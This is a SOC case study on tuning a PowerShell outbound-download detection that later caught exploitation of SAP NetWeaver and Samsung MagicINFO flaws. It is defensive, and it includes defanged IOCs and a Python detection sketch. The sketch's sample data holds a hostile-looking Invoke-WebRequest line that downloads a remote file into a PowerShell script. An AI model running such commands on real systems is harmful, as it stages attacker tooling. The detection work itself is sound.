Executive Summary
In this case study, we explore how a threat hunting analytic evolved from a noisy, broad detection rule into a precise, real-time alert, enabling the detection of post-compromise activity across different customer environments.
Following a post-compromise incident involving Customer A, the Fortra SOC identified surrounding suspicious PowerShell-based behaviour on a threat hunting dashboard, in a daily-reviewed analytic. While the original analytic was too noisy for real-time alerting, it led to a refinement of the logic into a high-fidelity analytic with actionable value.
A few months later, that refined analytic successfully triggered an alert in Customer B, uncovering post-compromise activity achieved through exploiting a different CVE, but exhibiting a similar technique: PowerShell-based file downloads.
This outcome demonstrates the value of iterative analytic tuning and behavioural threat hunting in identifying repeatable attacker tradecraft across environments, even when threats differ in origin, tooling or initial entry vectors.
Initial Detection: Incident in Customer A
In April 2025, the Fortra SOC alerted Customer A to a Kerberoasting attack happening in their environment. Kerberoasting is a post-compromise Active Directory (AD) attack that targets the Kerberos authentication protocol with the intention of stealing AD credentials. Based on the naming of the affected user account the SOC observed, and the absence of surrounding indicators of an entry vector, an early hypothesis was formed that this attack may have revolved around a remote code execution (RCE) vulnerability in SAP NetWeaver; the SOC was able to inform the customer of this hypothesis and point them in that direction.
As part of standard post-compromise investigation procedures, the SOC team began reviewing behavioural and contextual telemetry for additional indicators of compromise.
During this process, the team turned to the daily-reviewed threat hunting analytics: detections that surface behaviours of interest without generating real-time alerts, because of their broader scope or higher false positive rates. One particular analytic, designed to detect PowerShell initiating outbound connections to IP addresses, stood out. Though previously considered too noisy for production alerting, it had uncovered previously unseen PowerShell-based download activity associated with the attacker’s post-compromise actions.
At the time, the file hash for “rs64c[.]exe” had already been linked to Black Basta ransomware, and the IP address “162[.]220[.]61[.]172” had a reputation as a cracked Cobalt Strike Command & Control (C2) server. The Fortra SOC notified the customer of this activity immediately with recommendations. Around three weeks later, SAP disclosed CVE-2025-31324, a critical vulnerability in SAP NetWeaver Visual Composer that allows unauthenticated threat actors to upload malicious files. Following this disclosure came public articles on this CVE being exploited, with IOCs matching what was observed here, and ties to multiple ransomware groups.
It was ultimately determined that the post-compromise activity observed by the Fortra SOC was the result of the SAP NetWeaver vulnerability CVE-2025-31324. This immediately put the vulnerability on Fortra’s radar and an Emerging Threat was called. This included developing and releasing numerous detections, such as vulnerability scan coverage, IDS signatures and log telemetry, to help detect exploitation of this vulnerability across the customer base.
Analytic Review and Refinement
While reviewing the threat hunting analytic, it became clear that the underlying behaviour – PowerShell being used to download files from external infrastructure – was a valuable indicator of post-compromise activity, but the existing detection was too broad. It frequently matched legitimate administrative or automation tasks.
Refinement Objectives:
Reduce noise from benign PowerShell usage
Retain visibility into attacker tradecraft
Make the logic reliable enough for real-time alerting
Refinements Implemented:
Added checks for presence of URI components, not just raw IP addresses, to focus on file downloads
Tuned logic to ignore known-good usage patterns, reducing false positives from internal scripts etc.
These changes resulted in a new high-fidelity analytic, which was then promoted to generate real-time alerts for the Fortra SOC to review.
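As an added illustration (not Fortra’s analytic or data), the following Python sketches the two generations of the rule described above and runs both over constructed PowerShell command lines: the original rule fires on any IP literal, while the refined rule requires a scheme, a non-internal IP and a URI path, and skips an allowlisted internal script. Host names, addresses (RFC 5737 documentation ranges for the “external” IPs), script paths and the allowlist are all made up.

```python
import ipaddress
import re

# Constructed PowerShell command lines standing in for endpoint telemetry.
# Hosts, addresses (RFC 5737 documentation ranges for "external" IPs) and
# script paths are made up; none come from the Fortra case.
SAMPLE_EVENTS = [
    ("ws-01", r'powershell.exe -c "Invoke-WebRequest http://203.0.113.10/upd.php -OutFile C:\Users\Public\win.ps1"'),
    ("ws-02", r'powershell.exe -c "Test-NetConnection 10.0.0.5 -Port 445"'),
    ("srv-01", r'powershell.exe -File C:\Scripts\inventory.ps1 -Api http://10.0.0.20/api/assets'),
    ("srv-02", r'powershell.exe -File C:\Scripts\patch-sync.ps1 -Source http://198.51.100.20/patches/kb.cab'),
    ("ws-04", r'powershell.exe -c "Resolve-DnsName 192.0.2.1"'),
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# Original, noisy analytic: any IPv4 literal in a PowerShell command line.
BARE_IP_RE = re.compile(IPV4)
# Refined analytic: scheme + literal IP (+ optional port) + a path component.
URI_IP_RE = re.compile(r"https?://(" + IPV4 + r")(?::\d+)?/(\S+)")
# Known-good patterns tuned out of the refined analytic (hypothetical allowlist
# of internal scripts, plus address ranges that are not "external").
ALLOWED_SCRIPTS = (r"c:\scripts\patch-sync.ps1",)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def noisy_rule(cmdline: str) -> bool:
    """Original logic: PowerShell referencing any IP literal."""
    return "powershell" in cmdline.lower() and BARE_IP_RE.search(cmdline) is not None

def refined_rule(cmdline: str) -> bool:
    """Refined logic: a download-style URI to an external IP, minus allowlisted scripts."""
    lowered = cmdline.lower()
    if "powershell" not in lowered or any(s in lowered for s in ALLOWED_SCRIPTS):
        return False
    for ip_text, path in URI_IP_RE.findall(cmdline):
        try:
            ip = ipaddress.ip_address(ip_text)
        except ValueError:  # e.g. 999.1.1.1 matches the regex but is not an address
            continue
        if any(ip in net for net in INTERNAL_NETS):
            continue
        if path.strip("\"'"):  # a real path, not just a trailing quote
            return True
    return False

def run_rule(events, rule):
    """Apply a rule to (host, cmdline) events and return the hosts that matched."""
    return [host for host, cmdline in events if rule(cmdline)]
```

Running `run_rule(SAMPLE_EVENTS, noisy_rule)` flags all five hosts, while `run_rule(SAMPLE_EVENTS, refined_rule)` flags only ws-01, the PHP-to-.ps1 download pattern the case study describes.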
Detection in Customer B
Several months later, the newly created alert fired – not in Customer A, but in Customer B. The Fortra SOC was alerted to PowerShell activity matching the refined pattern: a suspicious download from an external IP, where a URI was present.
This immediately looked suspicious to the SOC, as a PHP file was being downloaded and its contents were being written to a PowerShell script file named “win[.]ps1” on the customer’s host. A subsequent reputation check on “157[.]230[.]106[.]100” linked this IP address to malicious activity. With further investigation into this activity, the Fortra SOC was able to tie this attack to the Samsung MagicINFO 9 Server vulnerability (CVE-2025-4632) and inform the customer of this with the appropriate recommendation steps. The now automated detection alerted the SOC to true positive post-compromise activity happening in real time, allowing for a quick response and an escalation to the customer.
Fortra was then able to build specific detections for exploitation of this CVE, and was able to perform a proactive review of our data to see whether there were any indicators of other customers using Samsung MagicINFO, allowing us to reach out to those customers to make them aware of the CVE and ensure they were patched against it.
Key Differences from the Original Incident:
Different threat actor and infrastructure
Different initial entry vector - CVE-2025-4632 exploited
Despite these differences, the post-compromise behaviour shared a similarity: PowerShell used to download additional tooling from a remote host.
Due to the improved fidelity of the analytic, the alert was immediately actionable: investigation confirmed malicious activity early in the attack lifecycle, and the SOC was able to tie it to the exploitation of CVE-2025-4632 using published IOCs.
Outcomes and Impact
This analytic evolution directly enabled the early detection of a new, unrelated threat. Although Customer B’s incident differed entirely in its root cause and threat actor, the shared behavioural technique of the PowerShell-based downloads served as a reliable detection point.
Key Benefits:
Faster detection: The refined analytic triggered as soon as the behaviour occurred, reducing the time to triage and respond.
Cross-customer learning: Insights from Customer A’s incident enabled proactive defences for other customers.
Repeatable tradecraft detection: The entry vector was not initially detected, but a common post-compromise technique was used – now detectable in real time.
Impact:
False positives reduced
Time to detect: Reduced from hours to minutes
Detection coverage expanded: Analytic now deployed across all environments
Lessons Learned
This case illustrates the power of behavioural detection, even when technical indicators (IP addresses, domains, CVEs) differ.
What This Demonstrates:
Threat actors repeat tactics: Different campaigns can reuse similar post-compromise actions
Noise can be valuable: Analytics that seem noisy can surface highly effective detections – with tuning.
Cross-customer value: Lessons from one environment can be directly translated into improved security outcomes for other customers.
Conclusion
By investigating post-compromise activity in Customer A, and using threat hunting analytics to surface patterns of interest, the SOC was able to refine a noisy detection into a high-confidence analytic. That same analytic went on to detect similar activity in Customer B, despite different threat actors and attack vectors.
This case reinforces the importance of behavioural threat hunting, cross-environment learning, and continuous refinement of detection logic to stay ahead of evolving threats.